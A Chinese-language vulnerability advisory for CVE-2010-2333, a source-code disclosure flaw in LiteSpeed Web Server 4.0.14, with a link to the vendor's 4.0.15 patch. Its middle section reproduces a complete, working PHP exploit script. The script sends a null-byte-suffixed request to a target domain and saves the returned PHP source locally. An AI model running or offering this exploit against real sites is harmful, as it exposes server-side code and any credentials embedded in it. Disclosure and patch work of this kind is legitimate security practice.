LiteSpeed Web Server HTTP请求源码泄露漏洞
发布日期:2010-06-13
更新日期:2010-07-01
受影响系统:LiteSpeed Technologies LiteSpeed Web Server 4.0.14
不受影响系统:LiteSpeed Technologies LiteSpeed Web Server 4.0.15
描述:
BUGTRAQ ID:
40815
CVE ID:
CVE-2010-2333
LiteSpeed Web Server是一款高性能的web服务器。
LiteSpeed Web Server没有正确地处理HTTP请求,用户可以将所请求的扩展名更改为\x00.txt导致从返回中读取某些脚本(如PHP)的源码。
<*来源:Kingcope (
kingcope@gmx.net)
链接:
http://secunia.com/advisories/40128/
http://marc.info/?l=full-disclosure&m=127643766428142&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?php
/*
* LiteSpeed Web Server Remote Source Code Disclosure Exploit
* Usage : php exploit.php domain.com /path
* example : php exploit.php burtay.org index.php
* Coded By Burtay
* Special Thanks RMx And Megaturks Crews
*/
echo "\n ->LiteSpeed Web Server Remote Source Code Disclosure Exploit<-\n\nStarting\n";
$fp = fsockopen($argv[1], 80, $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br />\n";
}
else {
$out = "GET /".$argv[2]."\x00.txt HTTP/1.1\r\n";
$out .= "Host: ".$argv[1]."\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
$gelen = fgets($fp, 128);
$ac = fopen($argv[2],'ab');
fwrite($ac,$gelen);
fclose($ac);
}
echo "Dosya ".$argv[2]." ad? ile kaydedildi\n";
echo "Coded By Burtay\n";
echo "Burtay.Org\n";
echo "Megaturks.Net\n";
fclose($fp);
}
?>
http://www.exploit-db.com/download/13850建议:
厂商补丁:
LiteSpeed Technologies
----------------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.litespeedtech.com/latest/litespeed-web-server-4.0.15-released.html浏览次数:4788
严重程度:0(网友投票)
